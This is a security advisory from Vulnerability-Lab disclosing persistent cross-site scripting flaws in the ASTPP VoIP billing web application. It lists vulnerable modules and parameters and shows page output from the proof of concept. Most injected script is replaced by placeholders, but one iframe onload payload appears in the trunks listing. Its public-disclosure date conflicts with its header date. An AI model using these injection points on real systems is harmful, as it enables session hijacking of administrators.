241 lines
11 KiB
Text
Executable file
241 lines
11 KiB
Text
Executable file
Title:
|
|
======
|
|
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2012-08-17
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=687
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
687
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
4
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
ASTPP is a billing solution for Freeswitch and Asterisk. It supports pre-paid and post-paid billing with call
|
|
rating and credit control. It also provides many other features such as calling cards, least cost routing (LCR),
|
|
did management, resellers, callbacks, etc. ...
|
|
|
|
Customer Account Features
|
|
Reseller Support
|
|
Call Rating Capabilities
|
|
Least Cost & Failover Routing
|
|
Credit Control
|
|
DID Mapping
|
|
Automated Account & Device Management
|
|
Authentication
|
|
Calling Cards
|
|
Vendor Billing
|
|
Asterisk -Real-time Support
|
|
|
|
ASTPP is able to integrate with OSCommerce to provide a Web store for your users to purchase calling cards and sign up
|
|
for VoIP accounts. We also support multiple currency for each account type with real-time update using
|
|
Yahoo Finance (http://finance.yahoo.com/currency-converter).
|
|
|
|
(Copy of the Vendor Homepage: http://www.astpp.org/ )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the ASTPP VoIP (4cf207a) phone billing web application.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2011-08-17: Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
Details:
|
|
========
|
|
Multiple persistent input validation vulnerabilities are detected in the ASTPP VoIP (4cf207a) phone billing web application.
|
|
The web vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent).
|
|
|
|
The first persistent web vulnerability is located in the user management (admin) module with the bound vulnerable firstname,
|
|
lastname & company parameters. The first vulnerability can easily be exploited by customers to execute script code out of the
|
|
administrator user management module (backend). The customer can register with the malicious values or change the vulnerable
|
|
values via update profile after successful registration with a non malicious user.
|
|
|
|
The secound and third vulnerabilities are located in the add dids and add trunks module with the bound vulnerable access number,
|
|
note, trunk name, dialed number mods parameters.
|
|
|
|
The 4th persistent vulnerability is located in the Taxes - Tax Information modules with the bound vulnerable priority & description
|
|
application parameters.
|
|
|
|
Successful exploitation of the vulnerabilities can lead to session hijacking (manager/admin) or stable (persistent) context
|
|
manipulation. Exploitation requires low user inter action & low privileged web application user account.
|
|
|
|
Vulnerable Module(s):
|
|
[+] Account Management
|
|
[+] DIDs - Add New Your Own DIDs
|
|
[+] Trunks - Add Trunks
|
|
[+] Taxes - Tax Information
|
|
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] Firstname, Lastname & Company
|
|
[+] Access Number & Note
|
|
[+] Trunk Name, Dialed Number Mods - Actions
|
|
[+] Priority & Description
|
|
|
|
|
|
Affected Section(s):
|
|
[+] Account Listing - Actions
|
|
[+] DIDs - Edit Mask Listing
|
|
[+] Trunks Listing (Management)
|
|
[+] Tax - Edit Mask Listing
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
The persistent vulnerabilities can be exploited by remote attacker with low privileged user account and with low required
|
|
user inter action. For demonstration or reproduce ...
|
|
|
|
|
|
Review: Account Management - User Account Listing
|
|
|
|
<div style="text-align: center; width: 90px; white-space: normal;"><div style="text-align: center; width:
|
|
90px; white-space: normal;">venky</div></div></td><td align="center"><div style="text-align: center; width:
|
|
90px; white-space: normal;"><div style="text-align: center; width: 90px; white-space: normal;"> "></div></div></td>
|
|
<td align="center"><div style="text-align: center; width: 90px; white-space: normal;"><div style="text-align: center;
|
|
width: 90px; white-space: normal;[PERSISTENT INJECTED SCRIPT CODE] "></div></div></td><td align="center"><div style="text-align: center; width: 90px;
|
|
white-space: normal;"><div style="text-align: center; width: 90px; white-space: normal;"[PERSISTENT INJECTED SCRIPT CODE]></div></div></td><td
|
|
align="right"><div style="text-align: right; width: 70px; white-space: normal;"><div style="text-align: right; width:
|
|
70px; white-space: normal;">0.0000 USD</div></div></td><td align="right"><div style="text-align: right; width: 70px;
|
|
white-space: normal;"><div style="text-align: right; width: 75px; white-space: normal;">0.0000 USD</div></div></td><td
|
|
align="center"><div style="text-align: center; width: 70px; white-space: normal;"><div style="text-align: center; width:
|
|
70px; white-space: normal;">daily</div></div></td><td align="center"><div style="text-align: center; width: 50px;
|
|
white-space: normal;"><div style="text-align: center; width: 50px; white-space: normal;">No</div></div></td><td align="center">
|
|
<div style="text-align: center; width: 90px; white-space: normal;"><div style="text-align: center; width: 90px; white-space:
|
|
normal;">Customer</div></div></td><td align="center"><div style="text-align: center; width: 90px; white-space: normal;">
|
|
<div style="text-align: center; width: 90px; white-space: normal;">Active</div></div></td><td align="center"><div style="text-align:
|
|
center; width: 120px; white-space: normal;"><div style="text-align: center; width: 120px; white-space:
|
|
normal;"><a href="http://demo.astpp.org/accounts/payment_process/asdsadfas%20"><[PERSISTENT INJECTED SCRIPT CODE]"="" "=""
|
|
class="icon" style="text-decoration:none;background-image:url(/images/payment.png);" rel="facebox" title="ProcessPayment">
|
|
</a><a href="http://server/accounts/account_detail/asdsadfas
|
|
|
|
|
|
Review: DIDs
|
|
|
|
<li>
|
|
<label class="desc">Access Number:</label>
|
|
<input name="access_number" class="text field medium" size="20" readonly="readonly"
|
|
type="text"><[PERSISTENT INJECTED SCRIPT CODE]@108.163.242.106"=""></iframe>
|
|
<input name="id" value="11" type="hidden">
|
|
</li>
|
|
<li>
|
|
<label class="desc">Note:</label>
|
|
<input name="note" class="text field medium" size="10"
|
|
type="text"><[PERSISTENT INJECTED SCRIPT CODE]")' <"=""></iframe>
|
|
</li>
|
|
<li>
|
|
<label class="desc">Status:</label>
|
|
<select name="status" class="select field medium">
|
|
<option value="0" selected="selected">ACTIVE</option>
|
|
<option value="1">INACTIVE</option>
|
|
</select>
|
|
|
|
|
|
Review: Trunks
|
|
|
|
<td align="center"><div style="text-align: center; width: 329px; white-space: normal;">
|
|
<a href="http://server/lcr/trunks/edit/"><[PERSISTENT INJECTED SCRIPT CODE]"' class="icon" style="
|
|
text-decoration:none;background-image:url(/images/page_edit.png);" rel="facebox" title="Update"> </a><a
|
|
href="/lcr/trunks/delete/"><iframe src=a onload=alert("/"
|
|
class="icon"
|
|
style="text-decoration:none;background-image:url(/images/delete.png);"
|
|
title="Delete" onClick="return
|
|
get_alert_msg();"> </a></iframe></a></div></td></tr></tbody></table>
|
|
<div style="display: none;" class="iDiv"></div></div>
|
|
|
|
|
|
Review: Taxes
|
|
|
|
<fieldset style="width:585px;">
|
|
<legend><span style="font-size:14px; font-weight:bold; color:#000;">Taxes Information</span></legend>
|
|
<li>
|
|
<label class="desc">Priority:</label><input class="text field medium" value="0" name="taxes_priority" size="20" type="text">
|
|
</li>
|
|
<li>
|
|
<label class="desc">Amount:</label><input class="text field medium" value="0.0000" name="taxes_amount" size="20" type="text">
|
|
</li>
|
|
<li>
|
|
<label class="desc">Rate(%):</label>
|
|
<input class="text field medium" value="0.0000" name="taxes_rate" size="8" type="text">
|
|
</li>
|
|
<li>
|
|
<label class="desc">Description:</label>
|
|
<input class="text field medium" type="text"><[PERSISTENT INJECTED SCRIPT CODE]")' <"="" name="taxes_description" size="8"></iframe>
|
|
</li>
|
|
</fieldset>
|
|
|
|
|
|
Risk:
|
|
=====
|
|
The security risk of the persistent web vulnerabilities are estimated as high(-).
|
|
|
|
|
|
Credits:
|
|
========
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
|
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
|
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2012 | Vulnerability Laboratory
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY RESEARCH LABORATORY
|
|
LABORATORY RESEARCH TEAM
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|